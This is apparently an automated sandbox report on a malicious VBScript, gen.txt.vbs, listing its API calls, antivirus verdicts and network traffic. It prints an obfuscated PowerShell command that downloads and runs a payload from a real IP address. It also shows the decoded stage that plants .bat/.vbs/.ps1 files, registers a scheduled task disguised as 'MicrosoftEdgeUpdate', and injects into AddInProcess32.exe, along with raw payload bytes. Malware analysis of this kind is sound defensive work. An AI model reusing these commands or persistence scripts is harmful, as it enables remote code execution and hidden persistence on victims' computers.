NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05007000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05008000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05009000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05010000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05011000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05012000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05013000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 9:11 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05014000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\Users\Public\BTXQJSSA.bat
file	C:\Users\Public\BTXQJSSA.vbs

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://94.156.6.224:222/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline	"C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://94.156.6.224:222/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline	Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://94.156.6.224:222/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Aug. 24, 2023, 9:11 a.m.	show_type: 0 filepath_r: Cmd.exe parameters: /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://94.156.6.224:222/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789) filepath: Cmd.exe	1	1	0

File has been identified by 5 AntiVirus engines on VirusTotal as malicious (5 events)

Symantec	ISB.Downloader!gen80
ESET-NOD32	PowerShell/Runner.A suspicious
Kaspersky	HEUR:Trojan.Script.Generic
Tencent	Script.Trojan.Generic.Qnkl
ZoneAlarm	HEUR:Trojan.Script.Generic

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 24, 2023, 9:11 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (4 events)

Data received	~00~,.~00~,.~0A~,.~7D~,.~4C~,.~00~,.~00~,.~04~,.~02~,.~28~,.~1B~,.~00~,.~00~,.~0A~,.~2A~,.~3A~,.~02~,.~6F~,.~2C~,.~01~,.~00~,.~0A~,.~D2~,.~02~,.~28~,.~BC~,.~00~,.~00~,.~06~,.~2A~,.~32~,.~02~,.~20~,.~C0~,.~00~,.~00~,.~00~,.~6F~,.~1A~,.~01~,.~00~,.~0A~,.~2A~,.~6A~,.~02~,.~20~,.~CB~,.~00~,.~00~,.~00~,.~6F~,.~1A~,.~01~,.~00~,.~0A~,.~02~,.~03~,.~28~,.~81~,.~00~,.~00~,.~06~,.~16~,.~1E~,.~6F~,.~4F~,.~00~,.~00~,.~0A~,.~2A~,.~7E~,.~02~,.~20~,.~CA~,.~00~,.~00~,.~00~,.~6F~,.~1A~,.~01~,.~00~,.~0A~,.~02~,.~03~,.~28~,.~29~,.~01~,.~00~,.~0A~,.~28~,.~7D~,.~00~,.~00~,.~06~,.~16~,.~1A~,.~6F~,.~4F~,.~00~,.~00~,.~0A~,.~2A~,.~7A~,.~03~,.~39~,.~0C~,.~00~,.~00~,.~00~,.~02~,.~20~,.~C3~,.~00~,.~00~,.~00~,.~6F~,.~1A~,.~01~,.~00~,.~0A~,.~2A~,.~02~,.~20~,.~C2~,.~00~,.~00~,.~00~,.~6F~,.~1A~,.~01~,.~00~,.~0A~,.~2A~,.~1B~,.~30~,.~02~,.~00~,.~00~,.~01~,.~00~,.~00~,.~01~,.~00~,.~00~,.~11~,.~16~,.~0A~,.~38~,.~0E~,.~00~,.~00~,.~00~,.~20~,.~E8~,.~03~,.~00~,.~00~,.~28~,.~14~,.~00~,.~00~,.~0A~,.~06~,.~17~,.~58~,.~0A~,.~06~,.~7E~,.~12~,.~00~,.~00~,.~04~,.~28~,.~15~,.~00~,.~00~,.~0A~,.~32~,.~E5~,.~28~,.~03~,.~00~,.~00~,.~06~,.~3A~,.~06~,.~00~,.~00~,.~00~,.~16~,.~28~,.~16~,.~00~,.~00~,.~0A~,.~00~,.~28~,.~52~,.~00~,.~00~,.~06~,.~3A~,.~06~,.~00~,.~00~,.~00~,.~16~,.~28~,.~16~,.~00~,.~00~,.~0A~,.~7E~,.~0C~,.~00~,.~00~,.~04~,.~28~,.~17~,.~00~,.~00~,.~0A~,.~39~,.~05~,.~00~,.~00~,.~00~,.~28~,.~26~,.~00~,.~00~,.~06~,.~7E~,.~04~,.~00~,.~00~,.~04~,.~28~,.~17~,.~00~,.~00~,.~0A~,.~39~,.~05~,.~00~,.~00~,.~00~,.~28~,.~24~,.~00~,.~00~,.~06~,.~7E~,.~10~,.~00~,.~00~,.~04~,.~28~,.~17~,.~00~,.~00~,.~0A~,.~39~,.~0F~,.~00~,.~00~,.~00~,.~28~,.~4B~,.~00~,.~00~,.~06~,.~39~,.~05~,.~00~,.~00~,.~00~,.~28~,.~5B~,.~00~,.~00~,.~06~,.~28~,.~4F~,.~00~,.~00~,.~06~,.~14~,.~FE~,.~06~,.~49~,.~00~,.~00~,.~06~,.~73~,.~18~,.~00~,.~00~,.~0A~,.~73~,.~19~,.~00~,.~00~,.~0A~,.~6F~,.~1A~,.~00~,.~00~,.~0A~,.~7E~,.~0D~,.~00~,.~00~,.~04~,.~28~,.~17~,.~00~,.~00~,.~0A~,.~39~,.~16~,.~00~,.~00~,.~00~,.~14~,.~FE~,.~06~,.~32~,.~00~,.~00~,.~06~,.~73~,.~18~,.~00~,.~00~,.~0A~,.~73~,.~19~,.~00~,.~00~,.~0A~,.~6F~,.~1A~,.~00~,.~00~,.~0A~,.~DD~,.~06~,.~00~,.~00~,.~00~,.~26~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~00~,.~28~,.~12~,.~00~,.~00~,.~06~,.~3A~,.~0A~,.~00~,.~00~,.~00~,.~28~,.~1E~,.~00~,.~00~,.~06~,.~28~,.~1B~,.~00~,.~00~,.~06~,.~DD~,.~06~,.~00~,.~00~,.~00~,.~26~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~20~,.~88~,.~13~,.~00~,.~00~,.~28~,.~14~,.~00~,.~00~,.~0A~,.~2B~,.~D4~,.~01~,.~1C~,.~00~,.~00~,.~00~,.~00~,.~33~,.~00~,.~9B~,.~CE~,.~00~,.~06~,.~01~,.~00~,.~00~,.~01~,.~00~,.~00~,.~D5~,.~00~,.~19~,.~EE~,.~00~,.~06~,.~01~,.~00~,.~00~,.~01~,.~1B~,.~30~,.~02~,.~00~,.~41~,.~01~,.~00~,.~00~,.~02~,.~00~,.~00~,.~11~,.~28~,.~1C~,.~00~,.~00~,.~0A~,.~7E~,.~07~,.~00~,.~00~,.~04~,.~28~,.~1D~,.~00~,.~00~,.~0A~,.~6F~,.~1E~,.~00~,.~00~,.~0A~,.~80~,.~07~,.~00~,.~00~,.~04~,.~7E~,.~07~,.~00~,.~00~,.~04~,.~73~,.~6F~,.~00~,.~00~,.~06~,.~80~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~01~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~01~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~02~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~02~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~03~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~03~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~04~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~04~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~08~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~08~,.~00~
Data received	,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~0F~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~0F~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~0C~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~0C~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~0D~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~0D~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~10~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~10~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~13~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~13~,.~00~,.~00~,.~04~,.~28~,.~2D~,.~00~,.~00~,.~06~,.~80~,.~11~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~0A~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~0A~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~09~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~28~,.~1D~,.~00~,.~00~,.~0A~,.~73~,.~1F~,.~00~,.~00~,.~0A~,.~80~,.~0B~,.~00~,.~00~,.~04~,.~28~,.~04~,.~00~,.~00~,.~06~,.~0A~,.~DD~,.~08~,.~00~,.~00~,.~00~,.~26~,.~16~,.~0A~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~06~,.~2A~,.~00~,.~00~,.~00~,.~41~,.~1C~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~37~,.~01~,.~00~,.~00~,.~37~,.~01~,.~00~,.~00~,.~08~,.~00~,.~00~,.~00~,.~01~,.~00~,.~00~,.~01~,.~1B~,.~30~,.~04~,.~00~,.~51~,.~00~,.~00~,.~00~,.~02~,.~00~,.~00~,.~11~,.~7E~,.~0B~,.~00~,.~00~,.~04~,.~6F~,.~20~,.~00~,.~00~,.~0A~,.~6F~,.~21~,.~00~,.~00~,.~0A~,.~74~,.~33~,.~00~,.~00~,.~01~,.~28~,.~1C~,.~00~,.~00~,.~0A~,.~7E~,.~07~,.~00~,.~00~,.~04~,.~6F~,.~22~,.~00~,.~00~,.~0A~,.~28~,.~77~,.~00~,.~00~,.~06~,.~72~,.~01~,.~00~,.~00~,.~70~,.~28~,.~23~,.~00~,.~00~,.~0A~,.~7E~,.~0A~,.~00~,.~00~,.~04~,.~28~,.~1D~,.~00~,.~00~,.~0A~,.~6F~,.~24~,.~00~,.~00~,.~0A~,.~0A~,.~DD~,.~08~,.~00~,.~00~,.~00~,.~26~,.~16~,.~0A~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~06~,.~2A~,.~00~,.~00~,.~00~,.~01~,.~10~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~47~,.~47~,.~00~,.~08~,.~35~,.~00~,.~00~,.~01~,.~13~,.~30~,.~01~,.~00~,.~A7~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~72~,.~0F~,.~00~,.~00~,.~70~,.~80~,.~01~,.~00~,.~00~,.~04~,.~72~,.~C2~,.~00~,.~00~,.~70~,.~80~,.~02~,.~00~,.~00~,.~04~,.~72~,.~75~,.~01~,.~00~,.~70~,.~80~,.~03~,.~00~,.~00~,.~04~,.~72~,.~50~,.~02~,.~00~,.~70~,.~80~,.~04~,.~00~,.~00~,.~04~,.~72~,.~03~,.~03~,.~00~,.~70~,.~80~,.~05~,.~00~,.~00~,.~04~,.~72~,.~17~,.~03~,.~00~,.~70~,.~80~,.~06~,.~00~,.~00~,.~04~,.~72~,.~19~,.~03~,.~00~,.~70~,.~80~,.~07~,.~00~,.~00~,.~04~,.~72~,.~73~,.~03~,.~00~,.~70~,.~80~,.~08~,.~00~,.~00~,.~04~,.~72~,.~4E~,.~04~,.~00~,.~70~,.~80~,.~09~,.~00~,.~00~,.~04~,.~72~,.~A9~,.~16~,.~00~,.~70~,.~80~,.~0A~,.~00~,.~00~,.~04~,.~72~,.~5C~,.~1E~,.~00~,.~70~,.~80~,.~0C~,.~00~,.~00~,.~04~,.~72~,.~0F~,.~1F~,.~00~,.~70~,.~80~,.~0D~,.~00~,.~00~,.~04~,.~72~,.~C2~,.~1F~,.~00~,.~70~,.~80~,.~0F~,.~00~,.~00~,.~04~,.~72~,.~75~,.~20~,.~00~,.~70~,.~80~,.~10~,.~00~,.~00~,.~04~,.~14~,.~80~,.~11~,.~00~,.~00~,.~04~,.~72~,.~28~,.~21~,.~00~,.~70~,.~80~,.~12~,.~00~,.~00~,.~04~,.~72~,.~2C~,.~21~,.~00~,.~70~,.~80~,.~13~,.~00~,.~00~,.~04~,.~2A~,.~00~,.~1B~,.~30~,.~07~,.~00~,.~F1~,.~02~,.~00~,.~00~,.~03~,.~00~,.~00~,.~11~,.~18~,.~17~,.~1C~,.~73~,.~25~,.~00~,.~00~,.~0A~,.~25~,.~20~,.~00~,.~C8~,.~00~,.~00~,.~6F~,.~26~,.~00~,.~00~,.~0A~,.~25~,.~20~,.~00~,.~C8~,.~00~,.~00~,.~6F~,.~27~,.~00~,.~00~,.~0A~,.~28~,.~07~,.~00~,.~00~,.~06~,.~7E~,.~0F~,.~00~,.~00~,.~04~,.~72~,.~DF~,.~21~,.~00~,.~70~,.~28~,.~28~,.~00~,.~00~,.~0A~,.~39~,.~E3~,.~00~,.~00~,.~00~,.~7E~,.~02~,.~00~,.~00~,.~04~,.~17~,.~8D~,.~3D~,.~00~,.~00~,.~01~,.~25~,.~16~,.~1F~,.~2C~,.~9D~,.~6F~,.~29~,.~00~,.~00~,.~0A~,.~73~,.~2A~,.~00~,.~00~,.~0A~,.~7E~,.~02~,.~00~,.~00~,.~04~,.~17~,.~8D~,.~3D~,.~00~,.~00~,.~01~,.~25~,.~16~,.~1F~,.~2C~,.~9D~,.~6F~,.~29~,.~00~,.~00~,.~0A~,.~8E~,.~69~,.~6F~,.~2B~,.~00~,.~00~,.~0A~,.~9A~,.~0A~,.~7E~,.~01~,.~00~,.~00~,.~04~,.~17~,.~8D~,.~3D~,.~00~
Data received	,.~00~,.~00~,.~03~,.~00~,.~06~,.~18~,.~3E~,.~00~,.~49~,.~01~,.~E6~,.~02~,.~3C~,.~B8~,.~01~,.~00~,.~00~,.~00~,.~10~,.~18~,.~17~,.~1D~,.~26~,.~01~,.~E6~,.~02~,.~00~,.~00~,.~00~,.~00~,.~03~,.~00~,.~46~,.~00~,.~E0~,.~1D~,.~A7~,.~16~,.~E6~,.~02~,.~48~,.~B8~,.~01~,.~00~,.~00~,.~00~,.~16~,.~00~,.~4B~,.~6B~,.~AC~,.~16~,.~E6~,.~02~,.~00~,.~00~,.~00~,.~00~,.~03~,.~00~,.~06~,.~18~,.~3E~,.~00~,.~49~,.~01~,.~E6~,.~02~,.~54~,.~B8~,.~01~,.~00~,.~00~,.~00~,.~10~,.~18~,.~17~,.~1D~,.~26~,.~01~,.~E6~,.~02~,.~00~,.~00~,.~00~,.~00~,.~03~,.~00~,.~46~,.~00~,.~E0~,.~1D~,.~B9~,.~16~,.~E6~,.~02~,.~60~,.~B8~,.~01~,.~00~,.~00~,.~00~,.~16~,.~00~,.~4B~,.~6B~,.~BE~,.~16~,.~E6~,.~02~,.~00~,.~00~,.~00~,.~00~,.~03~,.~00~,.~06~,.~18~,.~3E~,.~00~,.~49~,.~01~,.~E6~,.~02~,.~6C~,.~B8~,.~01~,.~00~,.~00~,.~00~,.~10~,.~18~,.~17~,.~1D~,.~26~,.~01~,.~E6~,.~02~,.~00~,.~00~,.~00~,.~00~,.~03~,.~00~,.~46~,.~00~,.~E0~,.~1D~,.~FB~,.~04~,.~E6~,.~02~,.~78~,.~B8~,.~01~,.~00~,.~00~,.~00~,.~16~,.~00~,.~4B~,.~6B~,.~CB~,.~16~
Data received	~xec~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~ute'.Replace('~,.~','')) $RXXn = 'C:\Wind~,.~ows~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~\Mic'.Replace('~,.~','') $EYA = $RXXn + 'ro~,.~soft.~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~NET\Fr'.Replace('~,.~','') $YYW = $EYA + 'ame~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~wo~,.~rk\v4.0'.Replace('~,.~','') $LDE = $YYW + '.30~,.~319\'.Replace('~,.~','') $IEZ = $LDE + 'A~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~dd~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~I~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~nP~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~roce~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~ss~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~32.~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~exe'.Replace('~,.~','') return $EZW = $EZW.$IUX($null,[object[]] ($IEZ,$bbb)); '@ [IO.File]::WriteAllText("C:\Users\Public\BTXQJSSA.ps1", $Content) $Content = @' @e%BTXQJSSA%%BTXQJSSA% off set "ps=powershell.exe" set "params=-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass" set "cmd=C:\Users\Public\BTXQJSSA.ps1" %ps% %params% -Command "& '%cmd%'" exit /b '@ [IO.File]::WriteAllText("C:\Users\Public\BTXQJSSA.bat", $Content) $Content = @' on error resume next on error resume next on error resume next on error resume next on error resume next on error resume next on error resume next on error resume next on error resume next on error resume next on error resume next Dim a, b, c, d a = "C:\Users\Public\BTXQJSSA.bat" b = "W" + "S" + "c" + "ript" bs = ".S" + "h" + "ell" c = 0 d = "" Set e = CreateObject(d & b & bs) e.Run a, c '@ [IO.File]::WriteAllText("C:\Users\Public\BTXQJSSA.vbs", $Content) Sleep 2 $scheduler = New-Object -ComObject Schedule.Service $scheduler.Connect() $taskDefinition = $scheduler.NewTask(0) $taskDefinition.RegistrationInfo.Description = "Runs a script every 2 minutes" $taskDefinition.Settings.Enabled = $true $taskDefinition.Settings.DisallowStartIfOnBatteries = $false $trigger = $taskDefinition.Triggers.Create(1) # 1 = TimeTrigger $trigger.StartBoundary = [DateTime]::Now.ToString("yyyy-MM-ddTHH:mm:ss") $trigger.Repetition.Interval = "PT2M" # Ø¥Ø¶Ø§ÙØ© Ø§ÙÙ Action $action = $taskDefinition.Actions.Create(0) # 0 = ExecAction $action.Path = "C:\Users\Public\BTXQJSSA.vbs" $taskFolder = $scheduler.GetFolder("\") $taskFolder.RegisterTaskDefinition("MicrosoftEdgeUpdate", $taskDefinition, 6, $null, $null, 3)

Poweshell is sending data to a remote host (1 event)

Data sent

GET /coder.jpg HTTP/1.1 Host: 94.156.6.224:222 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 24, 2023, 9:11 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

94.156.6.224

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send Aug. 24, 2023, 9:11 a.m.	buffer: GET /coder.jpg HTTP/1.1 Host: 94.156.6.224:222 Connection: Keep-Alive socket: 1400 sent: 75	1	75	0

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://94.156.6.224:222/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
parent_process	wscript.exe				martian_process	Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://94.156.6.224:222/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

Creates a suspicious Powershell process (12 events)

option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user
option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user
option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\cmd.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

gen.txt.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All